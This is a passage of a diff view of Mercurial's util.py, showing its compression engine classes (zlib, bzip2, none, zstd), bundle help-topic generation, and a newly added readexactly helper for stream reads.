3446 3446 If this engine can be used to compress revlogs, this method should
3447 3447 return the bytes used to identify chunks compressed with this engine.
3448 3448 Else, the method should return ``None`` to indicate it does not
3449 3449 participate in revlog compression.
3450 3450 """
3451 3451 return None
3452 3452
3453 3453 def compressstream(self, it, opts=None):
3454 3454 """Compress an iterator of chunks.
3455 3455
3456 3456 The method receives an iterator (ideally a generator) of chunks of
3457 3457 bytes to be compressed. It returns an iterator (ideally a generator)
3458 3458 of bytes of chunks representing the compressed output.
3459 3459
3460 3460 Optionally accepts an argument defining how to perform compression.
3461 3461 Each engine treats this argument differently.
3462 3462 """
3463 3463 raise NotImplementedError()
3464 3464
3465 3465 def decompressorreader(self, fh):
3466 3466 """Perform decompression on a file object.
3467 3467
3468 3468 Argument is an object with a ``read(size)`` method that returns
3469 3469 compressed data. Return value is an object with a ``read(size)`` that
3470 3470 returns uncompressed data.
3471 3471 """
3472 3472 raise NotImplementedError()
3473 3473
3474 3474 def revlogcompressor(self, opts=None):
3475 3475 """Obtain an object that can be used to compress revlog entries.
3476 3476
3477 3477 The object has a ``compress(data)`` method that compresses binary
3478 3478 data. This method returns compressed binary data or ``None`` if
3479 3479 the data could not be compressed (too small, not compressible, etc).
3480 3480 The returned data should have a header uniquely identifying this
3481 3481 compression format so decompression can be routed to this engine.
3482 3482 This header should be identified by the ``revlogheader()`` return
3483 3483 value.
3484 3484
3485 3485 The object has a ``decompress(data)`` method that decompresses
3486 3486 data. The method will only be called if ``data`` begins with
3487 3487 ``revlogheader()``. The method should return the raw, uncompressed
3488 3488 data or raise a ``RevlogError``.
3489 3489
3490 3490 The object is reusable but is not thread safe.
3491 3491 """
3492 3492 raise NotImplementedError()
3493 3493
3494 3494 class _zlibengine(compressionengine):
3495 3495 def name(self):
3496 3496 return 'zlib'
3497 3497
3498 3498 def bundletype(self):
3499 3499 """zlib compression using the DEFLATE algorithm.
3500 3500
3501 3501 All Mercurial clients should support this format. The compression
3502 3502 algorithm strikes a reasonable balance between compression ratio
3503 3503 and size.
3504 3504 """
3505 3505 return 'gzip', 'GZ'
3506 3506
3507 3507 def wireprotosupport(self):
3508 3508 return compewireprotosupport('zlib', 20, 20)
3509 3509
3510 3510 def revlogheader(self):
3511 3511 return 'x'
3512 3512
3513 3513 def compressstream(self, it, opts=None):
3514 3514 opts = opts or {}
3515 3515
3516 3516 z = zlib.compressobj(opts.get('level', -1))
3517 3517 for chunk in it:
3518 3518 data = z.compress(chunk)
3519 3519 # Not all calls to compress emit data. It is cheaper to inspect
3520 3520 # here than to feed empty chunks through generator.
3521 3521 if data:
3522 3522 yield data
3523 3523
3524 3524 yield z.flush()
3525 3525
3526 3526 def decompressorreader(self, fh):
3527 3527 def gen():
3528 3528 d = zlib.decompressobj()
3529 3529 for chunk in filechunkiter(fh):
3530 3530 while chunk:
3531 3531 # Limit output size to limit memory.
3532 3532 yield d.decompress(chunk, 2 ** 18)
3533 3533 chunk = d.unconsumed_tail
3534 3534
3535 3535 return chunkbuffer(gen())
3536 3536
3537 3537 class zlibrevlogcompressor(object):
3538 3538 def compress(self, data):
3539 3539 insize = len(data)
3540 3540 # Caller handles empty input case.
3541 3541 assert insize > 0
3542 3542
3543 3543 if insize < 44:
3544 3544 return None
3545 3545
3546 3546 elif insize <= 1000000:
3547 3547 compressed = zlib.compress(data)
3548 3548 if len(compressed) < insize:
3549 3549 return compressed
3550 3550 return None
3551 3551
3552 3552 # zlib makes an internal copy of the input buffer, doubling
3553 3553 # memory usage for large inputs. So do streaming compression
3554 3554 # on large inputs.
3555 3555 else:
3556 3556 z = zlib.compressobj()
3557 3557 parts = []
3558 3558 pos = 0
3559 3559 while pos < insize:
3560 3560 pos2 = pos + 2**20
3561 3561 parts.append(z.compress(data[pos:pos2]))
3562 3562 pos = pos2
3563 3563 parts.append(z.flush())
3564 3564
3565 3565 if sum(map(len, parts)) < insize:
3566 3566 return ''.join(parts)
3567 3567 return None
3568 3568
3569 3569 def decompress(self, data):
3570 3570 try:
3571 3571 return zlib.decompress(data)
3572 3572 except zlib.error as e:
3573 3573 raise error.RevlogError(_('revlog decompress error: %s') %
3574 3574 str(e))
3575 3575
3576 3576 def revlogcompressor(self, opts=None):
3577 3577 return self.zlibrevlogcompressor()
3578 3578
3579 3579 compengines.register(_zlibengine())
3580 3580
3581 3581 class _bz2engine(compressionengine):
3582 3582 def name(self):
3583 3583 return 'bz2'
3584 3584
3585 3585 def bundletype(self):
3586 3586 """An algorithm that produces smaller bundles than ``gzip``.
3587 3587
3588 3588 All Mercurial clients should support this format.
3589 3589
3590 3590 This engine will likely produce smaller bundles than ``gzip`` but
3591 3591 will be significantly slower, both during compression and
3592 3592 decompression.
3593 3593
3594 3594 If available, the ``zstd`` engine can yield similar or better
3595 3595 compression at much higher speeds.
3596 3596 """
3597 3597 return 'bzip2', 'BZ'
3598 3598
3599 3599 # We declare a protocol name but don't advertise by default because
3600 3600 # it is slow.
3601 3601 def wireprotosupport(self):
3602 3602 return compewireprotosupport('bzip2', 0, 0)
3603 3603
3604 3604 def compressstream(self, it, opts=None):
3605 3605 opts = opts or {}
3606 3606 z = bz2.BZ2Compressor(opts.get('level', 9))
3607 3607 for chunk in it:
3608 3608 data = z.compress(chunk)
3609 3609 if data:
3610 3610 yield data
3611 3611
3612 3612 yield z.flush()
3613 3613
3614 3614 def decompressorreader(self, fh):
3615 3615 def gen():
3616 3616 d = bz2.BZ2Decompressor()
3617 3617 for chunk in filechunkiter(fh):
3618 3618 yield d.decompress(chunk)
3619 3619
3620 3620 return chunkbuffer(gen())
3621 3621
3622 3622 compengines.register(_bz2engine())
3623 3623
3624 3624 class _truncatedbz2engine(compressionengine):
3625 3625 def name(self):
3626 3626 return 'bz2truncated'
3627 3627
3628 3628 def bundletype(self):
3629 3629 return None, '_truncatedBZ'
3630 3630
3631 3631 # We don't implement compressstream because it is hackily handled elsewhere.
3632 3632
3633 3633 def decompressorreader(self, fh):
3634 3634 def gen():
3635 3635 # The input stream doesn't have the 'BZ' header. So add it back.
3636 3636 d = bz2.BZ2Decompressor()
3637 3637 d.decompress('BZ')
3638 3638 for chunk in filechunkiter(fh):
3639 3639 yield d.decompress(chunk)
3640 3640
3641 3641 return chunkbuffer(gen())
3642 3642
3643 3643 compengines.register(_truncatedbz2engine())
3644 3644
3645 3645 class _noopengine(compressionengine):
3646 3646 def name(self):
3647 3647 return 'none'
3648 3648
3649 3649 def bundletype(self):
3650 3650 """No compression is performed.
3651 3651
3652 3652 Use this compression engine to explicitly disable compression.
3653 3653 """
3654 3654 return 'none', 'UN'
3655 3655
3656 3656 # Clients always support uncompressed payloads. Servers don't because
3657 3657 # unless you are on a fast network, uncompressed payloads can easily
3658 3658 # saturate your network pipe.
3659 3659 def wireprotosupport(self):
3660 3660 return compewireprotosupport('none', 0, 10)
3661 3661
3662 3662 # We don't implement revlogheader because it is handled specially
3663 3663 # in the revlog class.
3664 3664
3665 3665 def compressstream(self, it, opts=None):
3666 3666 return it
3667 3667
3668 3668 def decompressorreader(self, fh):
3669 3669 return fh
3670 3670
3671 3671 class nooprevlogcompressor(object):
3672 3672 def compress(self, data):
3673 3673 return None
3674 3674
3675 3675 def revlogcompressor(self, opts=None):
3676 3676 return self.nooprevlogcompressor()
3677 3677
3678 3678 compengines.register(_noopengine())
3679 3679
3680 3680 class _zstdengine(compressionengine):
3681 3681 def name(self):
3682 3682 return 'zstd'
3683 3683
3684 3684 @propertycache
3685 3685 def _module(self):
3686 3686 # Not all installs have the zstd module available. So defer importing
3687 3687 # until first access.
3688 3688 try:
3689 3689 from . import zstd
3690 3690 # Force delayed import.
3691 3691 zstd.__version__
3692 3692 return zstd
3693 3693 except ImportError:
3694 3694 return None
3695 3695
3696 3696 def available(self):
3697 3697 return bool(self._module)
3698 3698
3699 3699 def bundletype(self):
3700 3700 """A modern compression algorithm that is fast and highly flexible.
3701 3701
3702 3702 Only supported by Mercurial 4.1 and newer clients.
3703 3703
3704 3704 With the default settings, zstd compression is both faster and yields
3705 3705 better compression than ``gzip``. It also frequently yields better
3706 3706 compression than ``bzip2`` while operating at much higher speeds.
3707 3707
3708 3708 If this engine is available and backwards compatibility is not a
3709 3709 concern, it is likely the best available engine.
3710 3710 """
3711 3711 return 'zstd', 'ZS'
3712 3712
3713 3713 def wireprotosupport(self):
3714 3714 return compewireprotosupport('zstd', 50, 50)
3715 3715
3716 3716 def revlogheader(self):
3717 3717 return '\x28'
3718 3718
3719 3719 def compressstream(self, it, opts=None):
3720 3720 opts = opts or {}
3721 3721 # zstd level 3 is almost always significantly faster than zlib
3722 3722 # while providing no worse compression. It strikes a good balance
3723 3723 # between speed and compression.
3724 3724 level = opts.get('level', 3)
3725 3725
3726 3726 zstd = self._module
3727 3727 z = zstd.ZstdCompressor(level=level).compressobj()
3728 3728 for chunk in it:
3729 3729 data = z.compress(chunk)
3730 3730 if data:
3731 3731 yield data
3732 3732
3733 3733 yield z.flush()
3734 3734
3735 3735 def decompressorreader(self, fh):
3736 3736 zstd = self._module
3737 3737 dctx = zstd.ZstdDecompressor()
3738 3738 return chunkbuffer(dctx.read_from(fh))
3739 3739
3740 3740 class zstdrevlogcompressor(object):
3741 3741 def __init__(self, zstd, level=3):
3742 3742 # Writing the content size adds a few bytes to the output. However,
3743 3743 # it allows decompression to be more optimal since we can
3744 3744 # pre-allocate a buffer to hold the result.
3745 3745 self._cctx = zstd.ZstdCompressor(level=level,
3746 3746 write_content_size=True)
3747 3747 self._dctx = zstd.ZstdDecompressor()
3748 3748 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3749 3749 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3750 3750
3751 3751 def compress(self, data):
3752 3752 insize = len(data)
3753 3753 # Caller handles empty input case.
3754 3754 assert insize > 0
3755 3755
3756 3756 if insize < 50:
3757 3757 return None
3758 3758
3759 3759 elif insize <= 1000000:
3760 3760 compressed = self._cctx.compress(data)
3761 3761 if len(compressed) < insize:
3762 3762 return compressed
3763 3763 return None
3764 3764 else:
3765 3765 z = self._cctx.compressobj()
3766 3766 chunks = []
3767 3767 pos = 0
3768 3768 while pos < insize:
3769 3769 pos2 = pos + self._compinsize
3770 3770 chunk = z.compress(data[pos:pos2])
3771 3771 if chunk:
3772 3772 chunks.append(chunk)
3773 3773 pos = pos2
3774 3774 chunks.append(z.flush())
3775 3775
3776 3776 if sum(map(len, chunks)) < insize:
3777 3777 return ''.join(chunks)
3778 3778 return None
3779 3779
3780 3780 def decompress(self, data):
3781 3781 insize = len(data)
3782 3782
3783 3783 try:
3784 3784 # This was measured to be faster than other streaming
3785 3785 # decompressors.
3786 3786 dobj = self._dctx.decompressobj()
3787 3787 chunks = []
3788 3788 pos = 0
3789 3789 while pos < insize:
3790 3790 pos2 = pos + self._decompinsize
3791 3791 chunk = dobj.decompress(data[pos:pos2])
3792 3792 if chunk:
3793 3793 chunks.append(chunk)
3794 3794 pos = pos2
3795 3795 # Frame should be exhausted, so no finish() API.
3796 3796
3797 3797 return ''.join(chunks)
3798 3798 except Exception as e:
3799 3799 raise error.RevlogError(_('revlog decompress error: %s') %
3800 3800 str(e))
3801 3801
3802 3802 def revlogcompressor(self, opts=None):
3803 3803 opts = opts or {}
3804 3804 return self.zstdrevlogcompressor(self._module,
3805 3805 level=opts.get('level', 3))
3806 3806
3807 3807 compengines.register(_zstdengine())
3808 3808
3809 3809 def bundlecompressiontopics():
3810 3810 """Obtains a list of available bundle compressions for use in help."""
3811 3811 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3812 3812 items = {}
3813 3813
3814 3814 # We need to format the docstring. So use a dummy object/type to hold it
3815 3815 # rather than mutating the original.
3816 3816 class docobject(object):
3817 3817 pass
3818 3818
3819 3819 for name in compengines:
3820 3820 engine = compengines[name]
3821 3821
3822 3822 if not engine.available():
3823 3823 continue
3824 3824
3825 3825 bt = engine.bundletype()
3826 3826 if not bt or not bt[0]:
3827 3827 continue
3828 3828
3829 3829 doc = pycompat.sysstr('``%s``\n %s') % (
3830 3830 bt[0], engine.bundletype.__doc__)
3831 3831
3832 3832 value = docobject()
3833 3833 value.__doc__ = doc
3834 3834 value._origdoc = engine.bundletype.__doc__
3835 3835 value._origfunc = engine.bundletype
3836 3836
3837 3837 items[bt[0]] = value
3838 3838
3839 3839 return items
3840 3840
3841 3841 i18nfunctions = bundlecompressiontopics().values()
3842 3842
3843 3843 # convenient shortcut
3844 3844 dst = debugstacktrace
3845 3845
3846 3846 def safename(f, tag, ctx, others=None):
3847 3847 """
3848 3848 Generate a name that it is safe to rename f to in the given context.
3849 3849
3850 3850 f: filename to rename
3851 3851 tag: a string tag that will be included in the new name
3852 3852 ctx: a context, in which the new name must not exist
3853 3853 others: a set of other filenames that the new name must not be in
3854 3854
3855 3855 Returns a file name of the form oldname~tag[~number] which does not exist
3856 3856 in the provided context and is not in the set of other names.
3857 3857 """
3858 3858 if others is None:
3859 3859 others = set()
3860 3860
3861 3861 fn = '%s~%s' % (f, tag)
3862 3862 if fn not in ctx and fn not in others:
3863 3863 return fn
3864 3864 for n in itertools.count(1):
3865 3865 fn = '%s~%s~%s' % (f, tag, n)
3866 3866 if fn not in ctx and fn not in others:
3867 3867 return fn
3868
3869 def readexactly(stream, n):
3870 '''read n bytes from stream.read and abort if less was available'''
3871 s = stream.read(n)
3872 if len(s) < n:
3873 raise error.Abort(_("stream ended unexpectedly"
3874 " (got %d bytes, expected %d)")
3875 % (len(s), n))
3876 return s
General Comments 0
You need to be logged in to leave comments. Login now